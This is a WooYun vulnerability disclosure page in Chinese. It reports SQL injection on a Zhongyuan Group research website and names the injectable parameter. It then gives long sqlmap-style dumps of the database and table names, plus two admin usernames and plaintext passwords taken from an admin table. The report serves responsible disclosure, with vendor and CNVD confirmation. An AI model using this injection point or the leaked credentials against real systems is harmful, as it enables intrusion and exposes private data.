当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168600

漏洞标题:中原集团研究网站存在sql注入高危漏洞

相关厂商:中原集团

漏洞作者: dloved

提交时间:2016-01-13 11:44

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

RT

详细说明:

中原集团研究网站存在sql注入高危漏洞,造成多数据信息泄露。
URL:http://**.**.**.**/default.asp
注入点:

http://**.**.**.**/list_crt.asp?id=15


web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2005


Database: DgSite
[1 table]
+--------------------------------------------------------+
| dtproperties                                           |
+--------------------------------------------------------+
Database: master
[291 tables]
+--------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS                   |
| INFORMATION_SCHEMA.COLUMNS                             |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE                 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES                   |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE             |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE              |
| INFORMATION_SCHEMA.DOMAINS                             |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS                  |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE                    |
| INFORMATION_SCHEMA.PARAMETERS                          |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS             |
| INFORMATION_SCHEMA.ROUTINES                            |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                     |
| INFORMATION_SCHEMA.SCHEMATA                            |
| INFORMATION_SCHEMA.TABLES                              |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS                   |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES                    |
| INFORMATION_SCHEMA.VIEWS                               |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE                   |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE                    |
| spt_fallback_db                                        |
| spt_fallback_dev                                       |
| spt_fallback_usg                                       |
| spt_monitor                                            |
| spt_values                                             |
| sys.all_columns                                        |
| sys.all_objects                                        |
| sys.all_parameters                                     |
| sys.all_sql_modules                                    |
| sys.all_views                                          |
| sys.allocation_units                                   |
| sys.assemblies                                         |
| sys.assembly_files                                     |
| sys.assembly_modules                                   |
| sys.assembly_references                                |
| sys.assembly_types                                     |
| sys.asymmetric_keys                                    |
| sys.backup_devices                                     |
| sys.certificates                                       |
| sys.check_constraints                                  |
| sys.column_type_usages                                 |
| sys.column_xml_schema_collection_usages                |
| sys.columns                                            |
| **.**.**.**puted_columns                                   |
| sys.configurations                                     |
| sys.conversation_endpoints                             |
| sys.conversation_groups                                |
| sys.credentials                                        |
| sys.crypt_properties                                   |
| sys.data_spaces                                        |
| sys.database_files                                     |
| sys.database_mirroring                                 |
| sys.database_mirroring_endpoints                       |
| sys.database_mirroring_witnesses                       |
| sys.database_permissions                               |
| sys.database_principal_aliases                         |
| sys.database_principals                                |
| sys.database_recovery_status                           |
| sys.database_role_members                              |
| sys.databases                                          |
| sys.default_constraints                                |
| sys.destination_data_spaces                            |
| sys.dm_broker_activated_tasks                          |
| sys.dm_broker_connections                              |
| sys.dm_broker_forwarded_messages                       |
| sys.dm_broker_queue_monitors                           |
| sys.dm_clr_appdomains                                  |
| sys.dm_clr_loaded_assemblies                           |
| sys.dm_clr_properties                                  |
| sys.dm_clr_tasks                                       |
| sys.dm_db_file_space_usage                             |
| sys.dm_db_index_usage_stats                            |
| sys.dm_db_mirroring_connections                        |
| sys.dm_db_missing_index_details                        |
| sys.dm_db_missing_index_group_stats                    |
| sys.dm_db_missing_index_groups                         |
| sys.dm_db_partition_stats                              |
| sys.dm_db_session_space_usage                          |
| sys.dm_db_task_space_usage                             |
| sys.dm_exec_background_job_queue                       |
| sys.dm_exec_background_job_queue_stats                 |
| sys.dm_exec_cached_plans                               |
| sys.dm_exec_connections                                |
| sys.dm_exec_query_memory_grants                        |
| sys.dm_exec_query_optimizer_info                       |
| sys.dm_exec_query_resource_semaphores                  |
| sys.dm_exec_query_stats                                |
| sys.dm_exec_query_transformation_stats                 |
| sys.dm_exec_requests                                   |
| sys.dm_exec_sessions                                   |
| sys.dm_fts_active_catalogs                             |
| sys.dm_fts_index_population                            |
| sys.dm_fts_memory_buffers                              |
| sys.dm_fts_memory_pools                                |
| sys.dm_fts_population_ranges                           |
| sys.dm_io_backup_tapes                                 |
| sys.dm_io_cluster_shared_drives                        |
| sys.dm_io_pending_io_requests                          |
| sys.dm_os_buffer_descriptors                           |
| sys.dm_os_child_instances                              |
| sys.dm_os_cluster_nodes                                |
| sys.dm_os_hosts                                        |
| sys.dm_os_latch_stats                                  |
| sys.dm_os_loaded_modules                               |
| sys.dm_os_memory_allocations                           |
| sys.dm_os_memory_cache_clock_hands                     |
| sys.dm_os_memory_cache_counters                        |
| sys.dm_os_memory_cache_entries                         |
| sys.dm_os_memory_cache_hash_tables                     |
| sys.dm_os_memory_clerks                                |
| sys.dm_os_memory_objects                               |
| sys.dm_os_memory_pools                                 |
| sys.dm_os_performance_counters                         |
| sys.dm_os_ring_buffers                                 |
| sys.dm_os_schedulers                                   |
| sys.dm_os_stacks                                       |
| sys.dm_os_sublatches                                   |
| sys.dm_os_sys_info                                     |
| sys.dm_os_tasks                                        |
| sys.dm_os_threads                                      |
| sys.dm_os_virtual_address_dump                         |
| sys.dm_os_wait_stats                                   |
| sys.dm_os_waiting_tasks                                |
| sys.dm_os_worker_local_storage                         |
| sys.dm_os_workers                                      |
| sys.dm_qn_subscriptions                                |
| sys.dm_repl_articles                                   |
| sys.dm_repl_schemas                                    |
| sys.dm_repl_tranhash                                   |
| sys.dm_repl_traninfo                                   |
| sys.dm_tran_active_snapshot_database_transactions      |
| sys.dm_tran_active_transactions                        |
| sys.dm_tran_current_snapshot                           |
| sys.dm_tran_current_transaction                        |
| sys.dm_tran_database_transactions                      |
| sys.dm_tran_locks                                      |
| sys.dm_tran_session_transactions                       |
| sys.dm_tran_top_version_generators                     |
| sys.dm_tran_transactions_snapshot                      |
| sys.dm_tran_version_store                              |
| sys.endpoint_webmethods                                |
| sys.endpoints                                          |
| sys.event_notification_event_types                     |
| sys.event_notifications                                |
| sys.events                                             |
| sys.extended_procedures                                |
| sys.extended_properties                                |
| sys.filegroups                                         |
| sys.foreign_key_columns                                |
| sys.foreign_keys                                       |
| sys.fulltext_catalogs                                  |
| sys.fulltext_document_types                            |
| sys.fulltext_index_catalog_usages                      |
| sys.fulltext_index_columns                             |
| sys.fulltext_indexes                                   |
| sys.fulltext_languages                                 |
| sys.http_endpoints                                     |
| sys.identity_columns                                   |
| sys.index_columns                                      |
| sys.indexes                                            |
| sys.internal_tables                                    |
| sys.key_constraints                                    |
| sys.key_encryptions                                    |
| sys.linked_logins                                      |
| sys.login_token                                        |
| sys.master_files                                       |
| sys.master_key_passwords                               |
| sys.message_type_xml_schema_collection_usages          |
| sys.messages                                           |
| sys.module_assembly_usages                             |
| sys.numbered_procedure_parameters                      |
| sys.numbered_procedures                                |
| sys.objects                                            |
| sys.openkeys                                           |
| sys.parameter_type_usages                              |
| sys.parameter_xml_schema_collection_usages             |
| sys.parameters                                         |
| sys.partition_functions                                |
| sys.partition_parameters                               |
| sys.partition_range_values                             |
| sys.partition_schemes                                  |
| sys.partitions                                         |
| sys.plan_guides                                        |
| sys.procedures                                         |
| sys.remote_logins                                      |
| sys.remote_service_bindings                            |
| sys.routes                                             |
| sys.schemas                                            |
| sys.securable_classes                                  |
| sys.server_assembly_modules                            |
| sys.server_event_notifications                         |
| sys.server_events                                      |
| sys.server_permissions                                 |
| sys.server_principals                                  |
| sys.server_role_members                                |
| sys.server_sql_modules                                 |
| sys.server_trigger_events                              |
| sys.server_triggers                                    |
| sys.servers                                            |
| sys.service_broker_endpoints                           |
| sys.service_contract_message_usages                    |
| sys.service_contract_usages                            |
| sys.service_contracts                                  |
| sys.service_message_types                              |
| sys.service_queue_usages                               |
| sys.service_queues                                     |
| sys.services                                           |
| sys.soap_endpoints                                     |
| sys.sql_dependencies                                   |
| sys.sql_logins                                         |
| sys.sql_modules                                        |
| sys.stats                                              |
| sys.stats_columns                                      |
| sys.symmetric_keys                                     |
| sys.synonyms                                           |
| sys.sysaltfiles                                        |
| sys.syscacheobjects                                    |
| sys.syscharsets                                        |
| sys.syscolumns                                         |
| sys.syscomments                                        |
| sys.sysconfigures                                      |
| sys.sysconstraints                                     |
| sys.syscurconfigs                                      |
| sys.syscursorcolumns                                   |
| sys.syscursorrefs                                      |
| sys.syscursors                                         |
| sys.syscursortables                                    |
| sys.sysdatabases                                       |
| sys.sysdepends                                         |
| sys.sysdevices                                         |
| sys.sysfilegroups                                      |
| sys.sysfiles                                           |
| sys.sysforeignkeys                                     |
| sys.sysfulltextcatalogs                                |
| sys.sysindexes                                         |
| sys.sysindexkeys                                       |
| sys.syslanguages                                       |
| sys.syslockinfo                                        |
| sys.syslogins                                          |
| sys.sysmembers                                         |
| sys.sysmessages                                        |
| sys.sysobjects                                         |
| sys.sysoledbusers                                      |
| sys.sysopentapes                                       |
| sys.sysperfinfo                                        |
| sys.syspermissions                                     |
| sys.sysprocesses                                       |
| sys.sysprotects                                        |
| sys.sysreferences                                      |
| sys.sysremotelogins                                    |
| sys.syssegments                                        |
| sys.sysservers                                         |
| sys.system_columns                                     |
| sys.system_components_surface_area_configuration       |
| sys.system_internals_allocation_units                  |
| sys.system_internals_partition_columns                 |
| sys.system_internals_partitions                        |
| sys.system_objects                                     |
| sys.system_parameters                                  |
| sys.system_sql_modules                                 |
| sys.system_views                                       |
| sys.systypes                                           |
| sys.sysusers                                           |
| sys.tables                                             |
| sys.tcp_endpoints                                      |
| sys.trace_categories                                   |
| sys.trace_columns                                      |
| sys.trace_event_bindings                               |
| sys.trace_events                                       |
| sys.trace_subclass_values                              |
| sys.traces                                             |
| sys.transmission_queue                                 |
| sys.trigger_events                                     |
| sys.triggers                                           |
| sys.type_assembly_usages                               |
| sys.types                                              |
| sys.user_token                                         |
| sys.via_endpoints                                      |
| sys.views                                              |
| sys.xml_indexes                                        |
| sys.xml_schema_attributes                              |
| sys.xml_schema_collections                             |
| sys.xml_schema_component_placements                    |
| sys.xml_schema_components                              |
| sys.xml_schema_elements                                |
| sys.xml_schema_facets                                  |
| sys.xml_schema_model_groups                            |
| sys.xml_schema_namespaces                              |
| sys.xml_schema_types                                   |
| sys.xml_schema_wildcard_namespaces                     |
| sys.xml_schema_wildcards                               |
+--------------------------------------------------------+
Database: ccpr-cb
[98 tables]
+--------------------------------------------------------+
| Cityreport5AndLeadingindex                             |
| D99_Tmp                                                |
| \\?b9\\?cb\\?ce\\?ca\\?d6\\?d0\\?d0İ\\?b8\\?c0\\?fdNew |
| \\?b9\\?cb\\?ce\\?ca\\?d6\\?d0\\?d0İ\\?b8\\?c0\\?fd    |
| \\?ba\\?cf\\?d7\\?f7\\?bb\\?ef\\?b0\\?e9               |
| \\?d6\\?d0ԭ\\?d0\\?c5ͨ\\?b6\\?a9\\?d4\\?c4               |
| abc                                                    |
| admin5                                                 |
| artlist5                                               |
| artlista5                                              |
| artlistc5                                              |
| artzylh                                                |
| bigdata5                                               |
| c3pcode5                                               |
| c3poption5                                             |
| c3ptree5                                               |
| citydata5                                              |
| cityreport5                                            |
| count5                                                 |
| counter5                                               |
| countip5                                               |
| crtart5                                                |
| dtproperties                                           |
| file5                                                  |
| get35date5                                             |
| getdate5                                               |
| getweb5                                                |
| guestbook5                                             |
| gwzx5                                                  |
| gwzxbbs2                                               |
| gzeswq5                                                |
| house502                                               |
| house504                                               |
| house506                                               |
| house508                                               |
| house512                                               |
| house514                                               |
| house516                                               |
| house518                                               |
| house519                                               |
| house522                                               |
| house524                                               |
| house526                                               |
| house528                                               |
| house532                                               |
| house534                                               |
| house536                                               |
| house538                                               |
| house542                                               |
| house544                                               |
| house546                                               |
| house548                                               |
| house552                                               |
| house554                                               |
| house562                                               |
| house564                                               |
| house572                                               |
| house582                                               |
| house584                                               |
| house592                                               |
| house594                                               |
| house602                                               |
| house612                                               |
| house614                                               |
| house622                                               |
| house632                                               |
| housebuy5                                              |
| housebuy5month                                         |
| housing2                                               |
| housing5                                               |
| housinginfo5                                           |
| hps5                                                   |
| iplist5                                                |
| kb5                                                    |
| leadingindex5                                          |
| lpdq5                                                  |
| option5                                                |
| order5                                                 |
| pangolin_test_table                                    |
| piclist5                                               |
| policy5                                                |
| policyb5                                               |
| policylist1                                            |
| policylist2                                            |
| tab1                                                   |
| tab2                                                   |
| tab23                                                  |
| tab24                                                  |
| tab25                                                  |
| tab26                                                  |
| table5                                                 |
| tddata5                                                |
| textlist5                                              |
| textulist5                                             |
| type5                                                  |
| typem5                                                 |
| url5                                                   |
| urllist5                                               |
+--------------------------------------------------------+
Database: msdb
[9 tables]
+--------------------------------------------------------+
| backupfile                                             |
| backupmediafamily                                      |
| backupmediaset                                         |
| backupset                                              |
| logmarkhistory                                         |
| restorefile                                            |
| restorefilegroup                                       |
| restorehistory                                         |
| suspect_pages                                          |
+--------------------------------------------------------+


Database: ccpr-cb
Table: admin5
[7 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| date3  | int      |
| id3    | int      |
| info3  | ntext    |
| pass3  | nvarchar |
| power3 | smallint |
| text3  | ntext    |
| user3  | nvarchar |
+--------+----------+


Database: ccpr-cb
Table: admin5
[2 entries]
+------------+--------+
| user3      | pass3  |
+------------+--------+
| Management | 200308 |
| asdf       | asdf   |
+------------+--------+

漏洞证明:

Database: DgSite
[1 table]
+--------------------------------------------------------+
| dtproperties                                           |
+--------------------------------------------------------+
Database: master
[291 tables]
+--------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS                   |
| INFORMATION_SCHEMA.COLUMNS                             |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE                 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES                   |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE             |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE              |
| INFORMATION_SCHEMA.DOMAINS                             |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS                  |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE                    |
| INFORMATION_SCHEMA.PARAMETERS                          |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS             |
| INFORMATION_SCHEMA.ROUTINES                            |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                     |
| INFORMATION_SCHEMA.SCHEMATA                            |
| INFORMATION_SCHEMA.TABLES                              |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS                   |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES                    |
| INFORMATION_SCHEMA.VIEWS                               |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE                   |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE                    |
| spt_fallback_db                                        |
| spt_fallback_dev                                       |
| spt_fallback_usg                                       |
| spt_monitor                                            |
| spt_values                                             |
| sys.all_columns                                        |
| sys.all_objects                                        |
| sys.all_parameters                                     |
| sys.all_sql_modules                                    |
| sys.all_views                                          |
| sys.allocation_units                                   |
| sys.assemblies                                         |
| sys.assembly_files                                     |
| sys.assembly_modules                                   |
| sys.assembly_references                                |
| sys.assembly_types                                     |
| sys.asymmetric_keys                                    |
| sys.backup_devices                                     |
| sys.certificates                                       |
| sys.check_constraints                                  |
| sys.column_type_usages                                 |
| sys.column_xml_schema_collection_usages                |
| sys.columns                                            |
| **.**.**.**puted_columns                                   |
| sys.configurations                                     |
| sys.conversation_endpoints                             |
| sys.conversation_groups                                |
| sys.credentials                                        |
| sys.crypt_properties                                   |
| sys.data_spaces                                        |
| sys.database_files                                     |
| sys.database_mirroring                                 |
| sys.database_mirroring_endpoints                       |
| sys.database_mirroring_witnesses                       |
| sys.database_permissions                               |
| sys.database_principal_aliases                         |
| sys.database_principals                                |
| sys.database_recovery_status                           |
| sys.database_role_members                              |
| sys.databases                                          |
| sys.default_constraints                                |
| sys.destination_data_spaces                            |
| sys.dm_broker_activated_tasks                          |
| sys.dm_broker_connections                              |
| sys.dm_broker_forwarded_messages                       |
| sys.dm_broker_queue_monitors                           |
| sys.dm_clr_appdomains                                  |
| sys.dm_clr_loaded_assemblies                           |
| sys.dm_clr_properties                                  |
| sys.dm_clr_tasks                                       |
| sys.dm_db_file_space_usage                             |
| sys.dm_db_index_usage_stats                            |
| sys.dm_db_mirroring_connections                        |
| sys.dm_db_missing_index_details                        |
| sys.dm_db_missing_index_group_stats                    |
| sys.dm_db_missing_index_groups                         |
| sys.dm_db_partition_stats                              |
| sys.dm_db_session_space_usage                          |
| sys.dm_db_task_space_usage                             |
| sys.dm_exec_background_job_queue                       |
| sys.dm_exec_background_job_queue_stats                 |
| sys.dm_exec_cached_plans                               |
| sys.dm_exec_connections                                |
| sys.dm_exec_query_memory_grants                        |
| sys.dm_exec_query_optimizer_info                       |
| sys.dm_exec_query_resource_semaphores                  |
| sys.dm_exec_query_stats                                |
| sys.dm_exec_query_transformation_stats                 |
| sys.dm_exec_requests                                   |
| sys.dm_exec_sessions                                   |
| sys.dm_fts_active_catalogs                             |
| sys.dm_fts_index_population                            |
| sys.dm_fts_memory_buffers                              |
| sys.dm_fts_memory_pools                                |
| sys.dm_fts_population_ranges                           |
| sys.dm_io_backup_tapes                                 |
| sys.dm_io_cluster_shared_drives                        |
| sys.dm_io_pending_io_requests                          |
| sys.dm_os_buffer_descriptors                           |
| sys.dm_os_child_instances                              |
| sys.dm_os_cluster_nodes                                |
| sys.dm_os_hosts                                        |
| sys.dm_os_latch_stats                                  |
| sys.dm_os_loaded_modules                               |
| sys.dm_os_memory_allocations                           |
| sys.dm_os_memory_cache_clock_hands                     |
| sys.dm_os_memory_cache_counters                        |
| sys.dm_os_memory_cache_entries                         |
| sys.dm_os_memory_cache_hash_tables                     |
| sys.dm_os_memory_clerks                                |
| sys.dm_os_memory_objects                               |
| sys.dm_os_memory_pools                                 |
| sys.dm_os_performance_counters                         |
| sys.dm_os_ring_buffers                                 |
| sys.dm_os_schedulers                                   |
| sys.dm_os_stacks                                       |
| sys.dm_os_sublatches                                   |
| sys.dm_os_sys_info                                     |
| sys.dm_os_tasks                                        |
| sys.dm_os_threads                                      |
| sys.dm_os_virtual_address_dump                         |
| sys.dm_os_wait_stats                                   |
| sys.dm_os_waiting_tasks                                |
| sys.dm_os_worker_local_storage                         |
| sys.dm_os_workers                                      |
| sys.dm_qn_subscriptions                                |
| sys.dm_repl_articles                                   |
| sys.dm_repl_schemas                                    |
| sys.dm_repl_tranhash                                   |
| sys.dm_repl_traninfo                                   |
| sys.dm_tran_active_snapshot_database_transactions      |
| sys.dm_tran_active_transactions                        |
| sys.dm_tran_current_snapshot                           |
| sys.dm_tran_current_transaction                        |
| sys.dm_tran_database_transactions                      |
| sys.dm_tran_locks                                      |
| sys.dm_tran_session_transactions                       |
| sys.dm_tran_top_version_generators                     |
| sys.dm_tran_transactions_snapshot                      |
| sys.dm_tran_version_store                              |
| sys.endpoint_webmethods                                |
| sys.endpoints                                          |
| sys.event_notification_event_types                     |
| sys.event_notifications                                |
| sys.events                                             |
| sys.extended_procedures                                |
| sys.extended_properties                                |
| sys.filegroups                                         |
| sys.foreign_key_columns                                |
| sys.foreign_keys                                       |
| sys.fulltext_catalogs                                  |
| sys.fulltext_document_types                            |
| sys.fulltext_index_catalog_usages                      |
| sys.fulltext_index_columns                             |
| sys.fulltext_indexes                                   |
| sys.fulltext_languages                                 |
| sys.http_endpoints                                     |
| sys.identity_columns                                   |
| sys.index_columns                                      |
| sys.indexes                                            |
| sys.internal_tables                                    |
| sys.key_constraints                                    |
| sys.key_encryptions                                    |
| sys.linked_logins                                      |
| sys.login_token                                        |
| sys.master_files                                       |
| sys.master_key_passwords                               |
| sys.message_type_xml_schema_collection_usages          |
| sys.messages                                           |
| sys.module_assembly_usages                             |
| sys.numbered_procedure_parameters                      |
| sys.numbered_procedures                                |
| sys.objects                                            |
| sys.openkeys                                           |
| sys.parameter_type_usages                              |
| sys.parameter_xml_schema_collection_usages             |
| sys.parameters                                         |
| sys.partition_functions                                |
| sys.partition_parameters                               |
| sys.partition_range_values                             |
| sys.partition_schemes                                  |
| sys.partitions                                         |
| sys.plan_guides                                        |
| sys.procedures                                         |
| sys.remote_logins                                      |
| sys.remote_service_bindings                            |
| sys.routes                                             |
| sys.schemas                                            |
| sys.securable_classes                                  |
| sys.server_assembly_modules                            |
| sys.server_event_notifications                         |
| sys.server_events                                      |
| sys.server_permissions                                 |
| sys.server_principals                                  |
| sys.server_role_members                                |
| sys.server_sql_modules                                 |
| sys.server_trigger_events                              |
| sys.server_triggers                                    |
| sys.servers                                            |
| sys.service_broker_endpoints                           |
| sys.service_contract_message_usages                    |
| sys.service_contract_usages                            |
| sys.service_contracts                                  |
| sys.service_message_types                              |
| sys.service_queue_usages                               |
| sys.service_queues                                     |
| sys.services                                           |
| sys.soap_endpoints                                     |
| sys.sql_dependencies                                   |
| sys.sql_logins                                         |
| sys.sql_modules                                        |
| sys.stats                                              |
| sys.stats_columns                                      |
| sys.symmetric_keys                                     |
| sys.synonyms                                           |
| sys.sysaltfiles                                        |
| sys.syscacheobjects                                    |
| sys.syscharsets                                        |
| sys.syscolumns                                         |
| sys.syscomments                                        |
| sys.sysconfigures                                      |
| sys.sysconstraints                                     |
| sys.syscurconfigs                                      |
| sys.syscursorcolumns                                   |
| sys.syscursorrefs                                      |
| sys.syscursors                                         |
| sys.syscursortables                                    |
| sys.sysdatabases                                       |
| sys.sysdepends                                         |
| sys.sysdevices                                         |
| sys.sysfilegroups                                      |
| sys.sysfiles                                           |
| sys.sysforeignkeys                                     |
| sys.sysfulltextcatalogs                                |
| sys.sysindexes                                         |
| sys.sysindexkeys                                       |
| sys.syslanguages                                       |
| sys.syslockinfo                                        |
| sys.syslogins                                          |
| sys.sysmembers                                         |
| sys.sysmessages                                        |
| sys.sysobjects                                         |
| sys.sysoledbusers                                      |
| sys.sysopentapes                                       |
| sys.sysperfinfo                                        |
| sys.syspermissions                                     |
| sys.sysprocesses                                       |
| sys.sysprotects                                        |
| sys.sysreferences                                      |
| sys.sysremotelogins                                    |
| sys.syssegments                                        |
| sys.sysservers                                         |
| sys.system_columns                                     |
| sys.system_components_surface_area_configuration       |
| sys.system_internals_allocation_units                  |
| sys.system_internals_partition_columns                 |
| sys.system_internals_partitions                        |
| sys.system_objects                                     |
| sys.system_parameters                                  |
| sys.system_sql_modules                                 |
| sys.system_views                                       |
| sys.systypes                                           |
| sys.sysusers                                           |
| sys.tables                                             |
| sys.tcp_endpoints                                      |
| sys.trace_categories                                   |
| sys.trace_columns                                      |
| sys.trace_event_bindings                               |
| sys.trace_events                                       |
| sys.trace_subclass_values                              |
| sys.traces                                             |
| sys.transmission_queue                                 |
| sys.trigger_events                                     |
| sys.triggers                                           |
| sys.type_assembly_usages                               |
| sys.types                                              |
| sys.user_token                                         |
| sys.via_endpoints                                      |
| sys.views                                              |
| sys.xml_indexes                                        |
| sys.xml_schema_attributes                              |
| sys.xml_schema_collections                             |
| sys.xml_schema_component_placements                    |
| sys.xml_schema_components                              |
| sys.xml_schema_elements                                |
| sys.xml_schema_facets                                  |
| sys.xml_schema_model_groups                            |
| sys.xml_schema_namespaces                              |
| sys.xml_schema_types                                   |
| sys.xml_schema_wildcard_namespaces                     |
| sys.xml_schema_wildcards                               |
+--------------------------------------------------------+
Database: ccpr-cb
[98 tables]
+--------------------------------------------------------+
| Cityreport5AndLeadingindex                             |
| D99_Tmp                                                |
| \\?b9\\?cb\\?ce\\?ca\\?d6\\?d0\\?d0İ\\?b8\\?c0\\?fdNew |
| \\?b9\\?cb\\?ce\\?ca\\?d6\\?d0\\?d0İ\\?b8\\?c0\\?fd    |
| \\?ba\\?cf\\?d7\\?f7\\?bb\\?ef\\?b0\\?e9               |
| \\?d6\\?d0ԭ\\?d0\\?c5ͨ\\?b6\\?a9\\?d4\\?c4               |
| abc                                                    |
| admin5                                                 |
| artlist5                                               |
| artlista5                                              |
| artlistc5                                              |
| artzylh                                                |
| bigdata5                                               |
| c3pcode5                                               |
| c3poption5                                             |
| c3ptree5                                               |
| citydata5                                              |
| cityreport5                                            |
| count5                                                 |
| counter5                                               |
| countip5                                               |
| crtart5                                                |
| dtproperties                                           |
| file5                                                  |
| get35date5                                             |
| getdate5                                               |
| getweb5                                                |
| guestbook5                                             |
| gwzx5                                                  |
| gwzxbbs2                                               |
| gzeswq5                                                |
| house502                                               |
| house504                                               |
| house506                                               |
| house508                                               |
| house512                                               |
| house514                                               |
| house516                                               |
| house518                                               |
| house519                                               |
| house522                                               |
| house524                                               |
| house526                                               |
| house528                                               |
| house532                                               |
| house534                                               |
| house536                                               |
| house538                                               |
| house542                                               |
| house544                                               |
| house546                                               |
| house548                                               |
| house552                                               |
| house554                                               |
| house562                                               |
| house564                                               |
| house572                                               |
| house582                                               |
| house584                                               |
| house592                                               |
| house594                                               |
| house602                                               |
| house612                                               |
| house614                                               |
| house622                                               |
| house632                                               |
| housebuy5                                              |
| housebuy5month                                         |
| housing2                                               |
| housing5                                               |
| housinginfo5                                           |
| hps5                                                   |
| iplist5                                                |
| kb5                                                    |
| leadingindex5                                          |
| lpdq5                                                  |
| option5                                                |
| order5                                                 |
| pangolin_test_table                                    |
| piclist5                                               |
| policy5                                                |
| policyb5                                               |
| policylist1                                            |
| policylist2                                            |
| tab1                                                   |
| tab2                                                   |
| tab23                                                  |
| tab24                                                  |
| tab25                                                  |
| tab26                                                  |
| table5                                                 |
| tddata5                                                |
| textlist5                                              |
| textulist5                                             |
| type5                                                  |
| typem5                                                 |
| url5                                                   |
| urllist5                                               |
+--------------------------------------------------------+
Database: msdb
[9 tables]
+--------------------------------------------------------+
| backupfile                                             |
| backupmediafamily                                      |
| backupmediaset                                         |
| backupset                                              |
| logmarkhistory                                         |
| restorefile                                            |
| restorefilegroup                                       |
| restorehistory                                         |
| suspect_pages                                          |
+--------------------------------------------------------+


Database: ccpr-cb
Table: admin5
[7 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| date3  | int      |
| id3    | int      |
| info3  | ntext    |
| pass3  | nvarchar |
| power3 | smallint |
| text3  | ntext    |
| user3  | nvarchar |
+--------+----------+


Database: ccpr-cb
Table: admin5
[2 entries]
+------------+--------+
| user3      | pass3  |
+------------+--------+
| Management | 200308 |
| asdf       | asdf   |
+------------+--------+

修复方案:

过滤。

版权声明:转载请注明来源 dloved@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-15 18:24

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无